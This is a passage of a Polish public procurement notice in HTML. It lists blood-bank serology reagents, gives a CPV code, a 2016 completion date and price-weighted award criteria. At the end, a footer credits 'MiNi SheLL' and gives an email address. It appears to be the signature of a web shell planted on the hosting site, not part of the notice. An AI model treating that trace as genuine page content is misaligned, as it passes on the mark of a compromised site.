     -krwinki do identyfikacji p/ciał, panel 11 krwinek papainowych do testu enzymatycznego (11x4ml) -  w ilości 24 zestawy, 2 zestawy na miesiąc,
	  - krwinki do wykrywania p/ciał, (panel 3x10 ml) - w ilości 12 zestawów na rok, 1 zestaw na miesiąc,
     - zestawy do codziennej kontroli jakości odczynników- w ilości 2 zestawów w dostawie, 
     - odczynnik LISS - w ilości 18 litrów, a`500 ml
     - bromelina - w ilości 11 litrów, a`500 ml
     - sól płucząca - dwa rodzaje w łącznej  ilości 60 opakowań (A-40, B-20)
     - magnesy do mieszania zawiesin krwinek - 4 opakowań
odczynniki niezbędne do wykonania w/w badań muszą być w formie kart lub mikropłytek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com